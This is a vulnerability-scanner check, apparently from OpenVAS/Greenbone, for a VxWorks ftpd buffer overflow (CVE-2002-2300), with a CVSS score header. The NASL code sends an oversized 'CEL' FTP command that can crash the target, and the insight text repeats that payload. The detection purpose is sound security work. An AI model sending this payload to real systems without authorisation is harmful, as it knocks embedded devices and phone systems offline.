CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
AI Score
Confidence
Low
EPSS
Percentile
95.1%
It was possible to make the remote host
crash by issuing a FTP command.
# SPDX-FileCopyrightText: 2002 Michael Scheidell
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.11184");
script_version("2023-08-01T13:29:10+0000");
script_tag(name:"last_modification", value:"2023-08-01 13:29:10 +0000 (Tue, 01 Aug 2023)");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_cve_id("CVE-2002-2300");
script_name("vxworks ftpd buffer overflow Denial of Service");
script_category(ACT_KILL_HOST);
script_family("Denial of Service");
script_copyright("Copyright (C) 2002 Michael Scheidell");
script_dependencies("ftpserver_detect_type_nd_version.nasl");
script_require_ports("Services/ftp", 21);
script_mandatory_keys("ftp/vxftpd/detected");
script_xref(name:"URL", value:"http://www.kb.cert.org/vuls/id/317417");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/6297");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/7480");
script_xref(name:"URL", value:"https://web.archive.org/web/20081013065403/http://www.secnap.com/security/nbx001.html");
script_tag(name:"solution", value:"If you are using an embedded vxworks
product, please contact the OEM vendor and reference WindRiver field patch
TSR 296292. If this is the 3com NBX IP Phone call manager, contact 3com.");
script_tag(name:"affected", value:"This affects VxWorks ftpd versions 5.4 and 5.4.2.");
script_tag(name:"summary", value:"It was possible to make the remote host
crash by issuing a FTP command.");
script_tag(name:"insight", value:"It was possible to make the remote host
crash by issuing this FTP command:
CEL aaaa(...)aaaa
This problem is similar to the 'aix ftpd' overflow but on embedded vxworks based systems
like the 3com nbx IP phone call manager and seems to cause the server to crash.");
script_tag(name:"qod_type", value:"remote_probe");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("ftp_func.inc");
include("misc_func.inc");
include("port_service_func.inc");
port = ftp_get_port(default:21);
soc = open_sock_tcp(port);
if(!soc)
exit(0);
buf = ftp_recv_line(socket:soc);
if(!buf || "VxWorks" >!< buf){
close(soc);
exit(0);
}
start_denial();
buf = string("CEL a\r\n");
send(socket:soc, data:buf);
r = recv_line(socket:soc, length:1024);
if(!r)
exit(0);
buf = string("CEL ", crap(2048), "\r\n");
send(socket:soc, data:buf);
b = recv_line(socket:soc, length:1024);
ftp_close(socket: soc);
alive = end_denial();
if(!b)
security_message(port:port);
if(!alive)
set_kb_item( name:"Host/dead", value:TRUE );